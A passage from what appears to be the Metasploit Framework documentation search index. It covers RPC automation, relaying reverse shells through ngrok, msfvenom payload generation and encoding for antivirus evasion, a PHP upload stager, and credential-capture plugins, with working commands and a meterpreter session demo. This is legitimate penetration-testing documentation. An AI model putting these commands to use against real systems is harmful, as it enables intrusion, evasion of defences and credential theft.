    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-json-rpc.html"
  },"376": {
    "doc": "How to use Metasploit Messagepack RPC",
    "title": "Starting the messagepack RPC Server",
    "content": "Before you can use the RPC interface, you must start the RPC server. There are a couple of ways that you can start the server depending on the Metasploit product you are using. For this example we will use the MSFRPD Login Utility, but other methods can be found here. Use the follow command setting a username and password, current example uses user and pass retrospectively: . $ ruby msfrpcd -U &amp;lt;username&amp;gt; -P &amp;lt;pass&amp;gt; -f . ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html#starting-the-messagepack-rpc-server",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html#starting-the-messagepack-rpc-server"
  },"377": {
    "doc": "How to use Metasploit Messagepack RPC",
    "title": "Connecting with the MSFRPC Login Utility",
    "content": "The msfrpc login utility enables you to connect to the RPC server through msfrpcd. If you started the server using the msfrpcd tool, cd into your framework directory, if you’re a Framework user, or the metasploit/apps/pro/msf3 directory if you are a Pro user, and run the following command to connect to the server: . $ ruby msfrpc -U &amp;lt;username&amp;gt; -P &amp;lt;pass&amp;gt; -a &amp;lt;ip address&amp;gt; . You can provide the following options: . | -P &amp;lt;opt&amp;gt; - The password to access msfrpcd. | -S - Enables or disables SSL on the RPC socket. Set this value to true or false. SSL is on by default. | -U &amp;lt;opt&amp;gt; - The username to access msfrpcd. | -a &amp;lt;opt&amp;gt; - The address msfrpcd runs on. | -p &amp;lt;opt&amp;gt; - The port the msfrpc listens on. The default port is 55553. | . For example, if you want to connect to the local server, you can enter the following command: . $ ruby msfrpc -U user -P pass123 -a 127.0.0.1 . Which returns the following response: . [*] exec: ruby msfrpc -U user -P pass123 -a 127.0.0.1 [*] The 'rpc' object holds the RPC client interface [*] Use rpc.call('group.command') to make RPC calls . ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html#connecting-with-the-msfrpc-login-utility",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html#connecting-with-the-msfrpc-login-utility"
  },"378": {
    "doc": "How to use Metasploit Messagepack RPC",
    "title": "RPC Workflow examples",
    "content": "Start the server . Use the following command to run the server with a configured uesrname and password: . $ ruby msfrpcd -U user -P pass -f . Start the client in second terminal tab . Use the username and password set in the previous command to access the client: . # Start the client in second terminal tab $ ruby msfrpc -U user -P pass -a 0.0.0.0 . An interactive prompt will open: . [*] The 'rpc' object holds the RPC client interface [*] Use rpc.call('group.command') to make RPC calls . Commands . Before looking at commands, we will list the options that can be pass into RPC calls: . --rpc-host HOST --rpc-port PORT --rpc-ssl &amp;lt;true|false&amp;gt; --rpc-uri URI --rpc-user USERNAME --rpc-pass PASSWORD --rpc-token TOKEN --rpc-config CONFIG-FILE --rpc-help . Auxiliary module example . To execute the scanner/smb/smb_enumshares module: . &amp;gt;&amp;gt; rpc.call(\"module.execute\", \"auxiliary\", \"scanner/smb/smb_enumshares\", {\"RHOSTS\" =&amp;gt; \"192.168.175.135\", \"SMBUSER\" =&amp;gt; \"Administrator\", \"SMBPASS\" =&amp;gt; \"Password1\"}) =&amp;gt; {\"job_id\"=&amp;gt;0, \"uuid\"=&amp;gt;\"yJWES2Y6d4MRyfFLWjqhqvon\"} . Note that the result returns the job_id and uuid - which can be used for tracking the module’s progress. The arguments supplied are: . | \"module.execute\" - The method you want to call against the module | \"auxiliary\" - the module type | \"scanner/smb/smb_enumshares\" - The specific module you want to run | {\"RHOSTS\" =&amp;gt; \"192.168.175.135\", \"SMBUSER\" =&amp;gt; \"Administrator\", \"SMBPASS\" =&amp;gt; \"Password1\"} - The module’s datastore options | . Query all running stats with: . &amp;gt;&amp;gt; rpc.call('module.running_stats') =&amp;gt; {\"waiting\"=&amp;gt;[], \"running\"=&amp;gt;[], \"results\"=&amp;gt;[\"yJWES2Y6d4MRyfFLWjqhqvon\"]} . Note that the output contains the previous uuid, which has now been marked as completed. To view the module results for a given UUID: . 
&amp;gt;&amp;gt; rpc.call('module.results', 'yJWES2Y6d4MRyfFLWjqhqvon') =&amp;gt; {\"status\"=&amp;gt;\"completed\", \"result\"=&amp;gt;nil} . Listing current jobs/sessions . To list the current jobs: . &amp;gt;&amp;gt; rpc.call('job.list') =&amp;gt; {\"0\"=&amp;gt;\"Exploit: windows/smb/ms17_010_psexec\"} . To list the current sessions: . &amp;gt;&amp;gt; rpc.call('session.list') =&amp;gt; {1=&amp;gt; {\"type\"=&amp;gt;\"meterpreter\", \"tunnel_local\"=&amp;gt;\"192.168.8.125:4444\", \"tunnel_peer\"=&amp;gt;\"192.168.8.125:63504\", \"via_exploit\"=&amp;gt;\"exploit/windows/smb/psexec\", \"via_payload\"=&amp;gt;\"payload/windows/meterpreter/reverse_tcp\", \"desc\"=&amp;gt;\"Meterpreter\", \"info\"=&amp;gt;\"NT AUTHORITY\\\\SYSTEM @ DC1\", \"workspace\"=&amp;gt;\"false\", \"session_host\"=&amp;gt;\"192.168.175.135\", \"session_port\"=&amp;gt;445, \"target_host\"=&amp;gt;\"192.168.175.135\", \"username\"=&amp;gt;\"cgranleese\", \"uuid\"=&amp;gt;\"hqtjjwgx\", \"exploit_uuid\"=&amp;gt;\"hldyog8j\", \"routes\"=&amp;gt;\"\", \"arch\"=&amp;gt;\"x86\", \"platform\"=&amp;gt;\"windows\"}} . Killing sessions . To stop an active session use the session.stop command and pass the session ID. To find the session ID you can use the session.list command. rpc.call('session.stop', 1) . Example workflows . Let’s look at a some workflows using the commands we discussed above for a complete workflow. Auxiliary module workflow . 
[*] The 'rpc' object holds the RPC client interface [*] Use rpc.call('group.command') to make RPC calls &amp;gt;&amp;gt; rpc.call(\"module.execute\", \"auxiliary\", \"scanner/smb/smb_enumshares\", {\"RHOSTS\" =&amp;gt; \"xxx.xxx.xxx.xxx\", \"SMBUSER\" =&amp;gt; \"user\", \"SMBPASS\" =&amp;gt; \"password\"}) =&amp;gt; {\"job_id\"=&amp;gt;0, \"uuid\"=&amp;gt;\"yJWES2Y6d4MRyfFLWjqhqvon\"} &amp;gt;&amp;gt; rpc.call('module.running_stats') =&amp;gt; {\"waiting\"=&amp;gt;[], \"running\"=&amp;gt;[], \"results\"=&amp;gt;[\"yJWES2Y6d4MRyfFLWjqhqvon\"]} &amp;gt;&amp;gt; rpc.call('module.results', 'yJWES2Y6d4MRyfFLWjqhqvon') =&amp;gt; {\"status\"=&amp;gt;\"completed\", \"result\"=&amp;gt;nil} . Exploit module workflow . This workflow makes use of the module.check method to check if the target is vulnerable to the module’s exploit: . [*] The 'rpc' object holds the RPC client interface [*] Use rpc.call('group.command') to make RPC calls &amp;gt;&amp;gt; rpc.call(\"module.check\", \"exploit\", \"windows/smb/ms17_010_psexec\", {\"RHOSTS\" =&amp;gt; xxx.xxx.xxx.xxx\", \"SMBUSER\" =&amp;gt; \"user\", \"SMBPASS\" =&amp;gt; \"password\"}) =&amp;gt; {\"job_id\"=&amp;gt;0, \"uuid\"=&amp;gt;\"q3eewYtM3LqxuVN5ai1Wya3i\"} &amp;gt;&amp;gt; rpc.call('module.running_stats') =&amp;gt; {\"waiting\"=&amp;gt;[], \"running\"=&amp;gt;[], \"results\"=&amp;gt;[\"q3eewYtM3LqxuVN5ai1Wya3i\"]} &amp;gt;&amp;gt; rpc.call('module.results', 'q3eewYtM3LqxuVN5ai1Wya3i') =&amp;gt; {\"status\"=&amp;gt;\"completed\", \"result\"=&amp;gt;{\"code\"=&amp;gt;\"vulnerable\", \"message\"=&amp;gt;\"The target is vulnerable.\", \"reason\"=&amp;gt;nil, \"details\"=&amp;gt;{\"os\"=&amp;gt;\"Windows 8.1 9600\", \"arch\"=&amp;gt;\"x64\"}}} . The module.result calls shows that the target is vulnerable, and additional metadata about the target has been returned. ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html#rpc-workflow-examples",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html#rpc-workflow-examples"
  },"379": {
    "doc": "How to use Metasploit Messagepack RPC",
    "title": "How to use Metasploit Messagepack RPC",
    "content": "The RPC API enables you to programmatically drive the Metasploit Framework and commercial products using HTTP-based remote procedure call (RPC) services. An RPC service is a collection of message types and remote methods that provide a structured way for external applications to interact with web applications. You can use the RPC interface to locally or remotely execute Metasploit commands to perform basic tasks like running modules, communicating with the database, interacting with sessions, exporting data, and generating reports. The Metasploit products are written primarily in Ruby, which is the easiest way to use the remote API. However, in addition to Ruby, any language with support for HTTPS and MessagePack, such as Python, Java, and C, can be used to take advantage of the RPC API. There are currently two implementations of Metasploit’s RPC: . | HTTP and messagepack - covered by this guide | HTTP and JSON - covered by a separate guide | . Note that both the messagepack and JSON RPC services provide very similar operations, and it is worth reviewing both documents. ",
    "url": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html",
    "relUrl": "/docs/using-metasploit/advanced/RPC/how-to-use-metasploit-messagepack-rpc.html"
  },"380": {
    "doc": "How to use Metasploit with ngrok",
    "title": "Overview",
    "content": "ngrok is a popular service that offers free port-forwarding that is easy to setup without needing to run a dedicated server on a public IP address (as is the case with SSH, socat and other more traditional options. This means that users behind a SNATing device such as a SOHO router can accept reverse shells and other connections without needing to configure port forwarding. WARNING: The nature of using ngrok is to send traffic through a third party. ngrok and the server which it utilizes are not affiliated with the Metasploit project. Use of ngrok effectively sends traffic through an untrusted third party and should be done with extreme caution. While Meterpreter has offered end-to-end encryption since Metasploit 6.0, other payloads and connections do not. ngrok can start multiple types of tunnels. The tcp tunnel is compatible with Metasploit’s payloads and most closely resembles a traditional port-forwarding configuration. The http tunnel type is not compatible with payloads, and should not be used. The tls tunnel type may be compatible, but access to it is restricted to the Enterprise and Pay-as-you-go paid plans. This document will focus on the use cases for the tcp tunnel type. Note that one limitation is that the public port can not be configured, it is randomly selected by ngrok meaning that the target will need to be able to connect to this high, obscure port which may be prevented by egress filtering. ",
    "url": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html#overview",
    "relUrl": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html#overview"
  },"381": {
    "doc": "How to use Metasploit with ngrok",
    "title": "Usage with payloads",
    "content": "Use with payloads can be achieved with any of the reverse-connection stagers that accept LHOST and LPORT options, e.g. reverse_tcp, reverse_http, reverse_https, etc. but not reverse_named_pipe. In the following scenario, ngrok will be used to forward a random public port to the Metasploit listener on port 4444. This scenario assumes that Metasploit and ngrok are running on the same host. NOTE: At this time, payloads handle DNS hostnames inconsistently. Some are compatible with hostnames while others require IP addresses to be specified as the target to connect to (the LHOST option). To ensure the specified payload will work, the hostname provided by ngrok should be resolved to an IP address and the IP address should be used as the value for LHOST. | Start a TCP tunnel using ngrok: ngrok tcp localhost:4444. | ngrok should start running and display a few settings, including a line that says “Forwarding”. Note the host and port number from this line, e.g. 4.tcp.ngrok.io:13779 | Resolve the hostname from the previous step to an IP address. | Start msfconsole and use the desired payload or exploit module. | Using msfconsole for both generating the payload and handling the connection is recommended over using msfvenom for two reasons. | . | Using msfvenom starts up an instance of the framework to generate the payload, making it a slower process. | Using msfconsole to configure both the payload and handler simultaneously ensures that the options are set for both, eliminating the possibility that they are out of sync. | . | Set the LHOST option to the IP address noted in step 3. This is the address the payload will connect to. | Set the LPORT option to the port noted in step 2, 13779 in the example. | Set the ReverseListenerBindAddress option to 127.0.0.1. This is where the connection will actually be accepted from ngrok. | Set the ReverseListenerBindPort option to 4444. 
| Either run the exploit, or generate the payload with the generate command and start the handler with to_handler | . Once the payload has been executed, either through the exploit or manual means, there should be an open connection seen through the ngrok terminal. Payload Demo . ngrok side: . $ ngrok tcp localhost:4444 ngrok (Ctrl+C to quit) Take our ngrok in production survey! https://forms.gle/aXiBFWzEA36DudFn6 Session Status online Account ????? (Plan: Personal) Version 3.16.0 Region United States (us) Latency 33ms Web Interface http://127.0.0.1:4040 Forwarding tcp://4.tcp.ngrok.io:17511 -> localhost:4444 Connections ttl opn rt1 rt5 p50 p90 0 0 0.00 0.00 0.00 0.00 . resolve the hostname 4.tcp.ngrok.io to an IP address . $ dig +short 4.tcp.ngrok.io 192.0.2.1 . metasploit side: . msf6 > use payload/windows/x64/meterpreter/reverse_http msf6 payload(windows/x64/meterpreter/reverse_http) > set LHOST 192.0.2.1 LHOST => 192.0.2.1 msf6 payload(windows/x64/meterpreter/reverse_http) > set LPORT 17511 LPORT => 17511 msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindAddress 127.0.0.1 ReverseListenerBindAddress => 127.0.0.1 msf6 payload(windows/x64/meterpreter/reverse_http) > set ReverseListenerBindPort 4444 ReverseListenerBindPort => 4444 msf6 payload(windows/x64/meterpreter/reverse_http) > to_handler [*] Payload Handler Started as Job 2 msf6 payload(windows/x64/meterpreter/reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4444 msf6 payload(windows/x64/meterpreter/reverse_http) > generate -f exe -o ngrok_payload.exe [*] Writing 7168 bytes to ngrok_payload.exe... msf6 payload(windows/x64/meterpreter/reverse_http) > [*] http://127.0.0.1:4444 handling request from 127.0.0.1; (UUID: ghzekibo) Staging x64 payload (202844 bytes) ... 
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55468) at 2024-09-10 16:43:58 -0400 msf6 payload(windows/x64/meterpreter/reverse_http) > sessions -i -1 [*] Starting interaction with 1... meterpreter > getuid Server username: MSFLAB\\smcintyre meterpreter > . ",
    "url": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html#usage-with-payloads",
    "relUrl": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html#usage-with-payloads"
  },"382": {
    "doc": "How to use Metasploit with ngrok",
    "title": "Usage with server modules",
    "content": "Some modules expect connections to be made to them by the target. These modules can also be used with ngrok, with some slight variations to the payload workflow with regard to their datastore options. Modules that start servers can be identified by their use of the SRVHOST and SRVPORT datastore options. NOTE: Free ngrok plans can only open one tcp tunnel at a time. This means that if the module is an exploit, a second tcp tunnel for a reverse-connection payload cannot be opened at the same time. Use a second ngrok account to open a second tcp tunnel and follow the steps above for the payload configuration. | Start a TCP tunnel using ngrok: ngrok tcp localhost:4444. | ngrok should start running and display a few settings, including a line that says “Forwarding”. Note the host and port number from this line, e.g. 4.tcp.ngrok.io:13779 | Resolve the hostname from the previous step to an IP address. | Start msfconsole and use the desired module. | Set the LHOST option to the IP address noted in step 3. This is the address the payload will connect to. | Set the SRVPORT option to the port noted in step 2, 13779 in the example. | Set the ListenerBindAddress option to 127.0.0.1. This is where the connection will actually be accepted from ngrok. | Set the ListenerBindPort option to 4444. | Run the module. | . ",
    "url": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html#usage-with-server-modules",
    "relUrl": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html#usage-with-server-modules"
  },"383": {
    "doc": "How to use Metasploit with ngrok",
    "title": "How to use Metasploit with ngrok",
    "content": " ",
    "url": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html",
    "relUrl": "/docs/using-metasploit/other/how-to-use-metasploit-with-ngrok.html"
  },"384": {
    "doc": "AuthBrute",
    "title": "How to use Msf::Auxiliary::AuthBrute to write a bruteforcer",
    "content": "The Msf::Auxiliary::AuthBrute mixin should no longer be used to write a login module, you should try our LoginScanner API instead. However, some of the datastore options are still needed, so let’s go over them right quick. Regular options . | USERNAME - (String) A specific username to authenticate as. | PASSWORD - (String) A specific password to authenticate with. | USER_FILE - (String) File containing usernames, one per line. | PASS_FILE - (String) File containing passwords, one per line. | USERPASS_FILE - (String) File containing users and passwords separated by space, one pair per line. | BRUTEFORCE_SPEED - (Integer) How fast to bruteforce, from 0 to 5. | VERBOSE - (Boolean) Whether to print output for all attempts. | BLANK_PASSWORDS - (Boolean) Try blank passwords for all users. | USER_AS_PASS - (Boolean) Try the username as the password for all users. | DB_ALL_CREDS - (Boolean) Try each user/password couple stored in the current database. | DB_ALL_USERS - (Boolean) Add all users in the current database to the list. | STOP_ON_SUCCESS - (Boolean) Stop guessing when a credential works for a host. | . Advanced options . | REMOVE_USER_FILE - (Boolean) Automatically delete the USER_FILE on module completion. | REMOVE_PASS_FILE - (Boolean) Automatically delete the PASS_FILE on module completion. | REMOVE_USERPASS_FILE - (Boolean) Automatically delete the USERPASS_FILE on module completion. | MaxGuessesPerService - (Integer) Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used. | MaxMinutesPerService - (Integer) Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used. | MaxGuessesPerUser - (Integer) Maximum guesses for a particular username for the service instance. 
Note that users are considered unique among different services, so a user at 10.1.1.1:22 is different from one at 10.2.2.2:22, and both will be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number, this option will not be used. | . Reference . | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/auth_brute.rb | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-msf-auxiliary-authbrute-to-write-a-bruteforcer.html#how-to-use-msfauxiliaryauthbrute-to-write-a-bruteforcer",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-msf-auxiliary-authbrute-to-write-a-bruteforcer.html#how-to-use-msfauxiliaryauthbrute-to-write-a-bruteforcer"
  },"385": {
    "doc": "AuthBrute",
    "title": "AuthBrute",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-msf-auxiliary-authbrute-to-write-a-bruteforcer.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-msf-auxiliary-authbrute-to-write-a-bruteforcer.html"
  },"386": {
    "doc": "How to use msfvenom",
    "title": "How to generate a payload",
    "content": "To generate a payload, there are two flags that you must supply (-p and -f): . | The -p flag: Specifies what payload to generate | . To see what payloads are available from Framework, you can do: ./msfvenom -l payloads . The -p flag also supports “-“ as a way to accept a custom payload: . cat payload_file.bin | ./msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -f raw . | The -f flag: Specifies the format of the payload | . Syntax example: ./msfvenom -p windows/meterpreter/bind_tcp -f exe . To see what formats are supported, run: ./msfvenom --help-formats . Typically, this is how you will use msfvenom: . $ ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe . ",
    "url": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-generate-a-payload",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-generate-a-payload"
  },"387": {
    "doc": "How to use msfvenom",
    "title": "How to encode a payload",
    "content": "By default, the encoding feature will automatically kick in when you use the -b flag (the badchar flag). In other cases, you must use the -e flag like the following: ./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw . To find out what encoders you can use, you can use the -l flag: ./msfvenom -l encoders . You can also encode the payload multiple times using the -i flag. Sometimes more iterations may help avoid antivirus, but be aware that encoding isn’t really meant to be used as a real AV evasion solution: ./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 . ",
    "url": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-encode-a-payload",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-encode-a-payload"
  },"388": {
    "doc": "How to use msfvenom",
    "title": "How to avoid bad characters",
    "content": "The -b flag is meant to be used to avoid certain characters in the payload. When this option is used, msfvenom will automatically find a suitable encoder to encode the payload: ./msfvenom -p windows/meterpreter/bind_tcp -b '\\x00' -f raw . ",
    "url": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-avoid-bad-characters",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-avoid-bad-characters"
  },"389": {
    "doc": "How to use msfvenom",
    "title": "How to supply a custom template",
    "content": "By default, msfvenom uses templates from the msf/data/templates directory. If you’d like to choose your own, you can use the -x flag like the following: ./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe . Please note: If you’d like to create an x64 payload with a custom x64 template for Windows, then instead of the exe format, you should use exe-only: ./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe . The -x flag is often paired with the -k flag, which allows you to run your payload as a new thread from the template. However, this currently is only reliable for older Windows machines such as x86 Windows XP. ",
    "url": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-supply-a-custom-template",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-supply-a-custom-template"
  },"390": {
    "doc": "How to use msfvenom",
    "title": "How to chain msfvenom output",
    "content": "The old msfpayload and msfencode utilities were often chained together in order to layer on multiple encodings. This is possible using msfvenom as well: ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \\ ./msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | \\ ./msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe . ",
    "url": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-chain-msfvenom-output",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-msfvenom.html#how-to-chain-msfvenom-output"
  },"391": {
    "doc": "How to use msfvenom",
    "title": "How to use msfvenom",
    "content": "Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015. To start using msfvenom, first please take a look at the options it supports: . Options: -p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads --payload-options List the payload's standard options -l, --list [type] List a module type. Options are: payloads, encoders, nops, all -n, --nopsled <length> Prepend a nopsled of [length] size on to the payload -f, --format <format> Output format (use --help-formats for a list) --help-formats List available formats -e, --encoder <encoder> The encoder to use -a, --arch <arch> The architecture to use --platform <platform> The platform of the payload --help-platforms List available platforms -s, --space <length> The maximum size of the resulting payload --encoder-space <length> The maximum size of the encoded payload (defaults to the -s value) -b, --bad-chars <list> The list of characters to avoid example: '\\x00\\xff' -i, --iterations <count> The number of times to encode the payload -c, --add-code <path> Specify an additional win32 shellcode file to include -x, --template <path> Specify a custom executable file to use as a template -k, --keep Preserve the template behavior and inject the payload as a new thread -o, --out <path> Save the payload -v, --var-name <name> Specify a custom variable name to use for certain output formats --smallest Generate the smallest possible payload -h, --help Show this message . ",
    "url": "/docs/using-metasploit/basics/how-to-use-msfvenom.html",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-msfvenom.html"
  },"392": {
    "doc": "PhpExe",
    "title": "PhpExe",
    "content": "Arbitrary file upload is surprisingly common among web applications, and it can be abused to upload malicious files and then compromise the server. Usually, the attacker will select a payload based on whatever server-side programming language is supported. So if the vulnerable app is in PHP, then clearly PHP is supported, and an easy choice would be a PHP payload such as Metasploit’s PHP meterpreter. However, the PHP meterpreter does not share the same performance as, say, a Windows meterpreter. In practice, you will probably want to upgrade to a better shell, which involves extra manual work during the process. So why limit your payload options? For this type of scenario, you should use the PhpEXE mixin. It serves as a payload stager in PHP that will write the final malicious executable onto the remote file system, and then clear itself after use, so it leaves no traces. Requirements . To use the PhpEXE mixin, some typical exploitable requirements should be met: . | You must find a writable location on the web server. | The same writable location should also be readable with an HTTP request. | . Note: For an arbitrary file upload bug, there is usually a directory that contains uploaded files, and is readable. If the bug is due to a directory traversal, then a temp folder (either from the OS or the web app) would be your typical choice. Usage . First include the mixin under the scope of your MetasploitModule class like the following: . include Msf::Exploit::PhpEXE . Generate the payload (with the PHP stager) with get_write_exec_payload . p = get_write_exec_payload . If you’re working on a Linux target, then you can set unlink_self to true, which will automatically clear the executable: . p = get_write_exec_payload(:unlink_self=>true) . On Windows, you probably cannot clear the executable because it will probably still be in use. 
If it’s not possible to automatically clean up malicious files, you should always warn the user about where they are, so they can do it manually later during the penetration test. At this point you can upload the payload generated by get_write_exec_payload, and then call it by using a GET request. If you do not know how to send a GET request, please refer to the following article: How to Send an HTTP Request Using HttpClient . Reference . https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/php_exe.rb . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-phpexe-to-exploit-an-arbitrary-file-upload-bug.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-phpexe-to-exploit-an-arbitrary-file-upload-bug.html"
  },"393": {
    "doc": "Metasploit Plugins",
    "title": "Available Plugins",
    "content": "The current available plugins for Metasploit can be found by running the load -l command, or viewing Metasploit’s plugins directory: . | Name | Description | . | aggregator | Interacts with the external Session Aggregator | . | alias | Adds the ability to alias console commands | . | auto_add_route | Adds routes for any new subnets whenever a session opens | . | beholder | Capture screenshots, webcam pictures, and keystrokes from active sessions | . | besecure | Integrates with the beSECURE - open source vulnerability management | . | capture | Start all credential capture and spoofing services | . | db_credcollect | Automatically grab hashes and tokens from Meterpreter session events and store them in the database | . | db_tracker | Monitors socket calls and updates the database backend | . | event_tester | Internal test tool used to verify the internal framework event subscriber logic works | . | ffautoregen | This plugin reloads and re-executes a file-format exploit module once it has changed | . | fzuse | A plugin offering a fuzzy use command | . | ips_filter | Scans all outgoing data to see if it matches a known IPS signature | . | lab | Adds the ability to manage VMs | . | libnotify | Send desktop notification with libnotify on sessions and db events | . | msfd | Provides a console interface to users over a listening TCP port | . | msgrpc | Provides a MessagePack interface over HTTP | . | nessus | Nessus Bridge for Metasploit | . | nexpose | Integrates with the Rapid7 Nexpose vulnerability management product | . | openvas | Integrates with the OpenVAS - open source vulnerability management | . | pcap_log | Logs all socket operations to pcaps (in /tmp by default) | . | request | Make requests from within Metasploit using various protocols. | . | rssfeed | Create an RSS feed of events | . | sample | Demonstrates using framework plugins | . | session_notifier | This plugin notifies you of a new session via SMS | . 
| session_tagger | Automatically interacts with new sessions to create a new remote TaggedByUser file | . | socket_logger | Log socket operations to a directory as individual files | . | sounds | Automatically plays a sound when various framework events occur | . | sqlmap | sqlmap plugin for Metasploit | . | thread | Internal test tool for testing thread usage in Metasploit | . | token_adduser | Attempt to add an account using all connected Meterpreter session tokens | . | token_hunter | Search all active Meterpreter sessions for specific tokens | . | wiki | Outputs stored database values from the current workspace into DokuWiki or MediaWiki format | . | wmap | Web assessment plugin | . ",
    "url": "/docs/using-metasploit/intermediate/how-to-use-plugins.html#available-plugins",
    "relUrl": "/docs/using-metasploit/intermediate/how-to-use-plugins.html#available-plugins"
  },"394": {
    "doc": "Metasploit Plugins",
    "title": "Examples",
    "content": "Alias Plugin . The Alias plugin adds the ability to alias console commands: . msf6 > load alias [*] Successfully loaded plugin: alias msf6 > alias -h Usage: alias [options] [name [value]] OPTIONS: -c Clear an alias (* to clear all). -f Force an alias assignment. -h Help banner. Register an alias such as proxy_enable: . msf6 > alias proxy_enable \"set Proxies http:localhost:8079\" . Now when running the aliased proxy_enable command, the proxy datastore value will be set for the current module: . msf6 auxiliary(scanner/http/title) > proxy_enable Proxies => http:localhost:8079 . Viewing registered aliases: . msf6 > alias Current Aliases =============== Alias Name Alias Value ---------- ----------- alias proxy_enable set Proxies http:localhost:8079 . To automatically load and configure the alias plugin on startup of Metasploit, create a custom ~/.msf4/msfconsole.rc file: . load alias alias proxy_enable \"set Proxies http:localhost:8079\" alias proxy_disable \"unset Proxies\" alias routes \"route print\" . Capture Plugin . Capturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the modules/auxiliary/server/capture directory. Users can start and configure each of these modules individually, but now the capture plugin can streamline the process. The capture plugin can easily start 13 different services (17 including SSL enabled versions) on the same listening IP address including remote interfaces via Meterpreter. A configuration file can be used to select individual services to start and once finished, all services can easily be stopped using a single command. To use the plugin, it must first be loaded. That will provide the captureg command (for Capture-Global) which then offers start and stop subcommands. 
In the following example, the plugin is loaded, and then all default services are started on the 192.168.159.128 interface. msf6 > load capture [*] Successfully loaded plugin: Credential Capture msf6 > captureg start --ip 192.168.159.128 Logging results to /home/smcintyre/.msf4/logs/captures/capture_local_20220325104416_589275.txt Hash results stored in /home/smcintyre/.msf4/loot/captures/capture_local_20220325104416_612808 [+] Authentication Capture: DRDA (DB2, Informix, Derby) started [+] Authentication Capture: FTP started [+] HTTP Client MS Credential Catcher started [+] HTTP Client MS Credential Catcher started [+] Authentication Capture: IMAP started [+] Authentication Capture: MSSQL started [+] Authentication Capture: MySQL started [+] Authentication Capture: POP3 started [+] Authentication Capture: PostgreSQL started [+] Printjob Capture Service started [+] Authentication Capture: SIP started [+] Authentication Capture: SMB started [+] Authentication Capture: SMTP started [+] Authentication Capture: Telnet started [+] Authentication Capture: VNC started [+] Authentication Capture: FTP started [+] Authentication Capture: IMAP started [+] Authentication Capture: POP3 started [+] Authentication Capture: SMTP started [+] NetBIOS Name Service Spoofer started [+] LLMNR Spoofer started [+] mDNS Spoofer started [+] Started capture jobs msf6 > . This content was originally posted on the Rapid7 Blog. ",
    "url": "/docs/using-metasploit/intermediate/how-to-use-plugins.html#examples",
    "relUrl": "/docs/using-metasploit/intermediate/how-to-use-plugins.html#examples"
  },"395": {
    "doc": "Metasploit Plugins",
    "title": "Metasploit Plugins",
    "content": "Metasploit plugins can change the behavior of Metasploit framework by adding new features, new user interface commands, and more. They are designed to have a very loose definition in order to make them as useful as possible. Plugins are not loaded by default; they need to be loaded explicitly: . msf6 > load plugin_name . Plugins can be automatically loaded and configured on msfconsole’s start up by configuring a custom ~/.msf4/msfconsole.rc file: . load plugin_name plugin_name_command --option . ",
    "url": "/docs/using-metasploit/intermediate/how-to-use-plugins.html",
    "relUrl": "/docs/using-metasploit/intermediate/how-to-use-plugins.html"
  },"396": {
    "doc": "Powershell",
    "title": "Powershell",
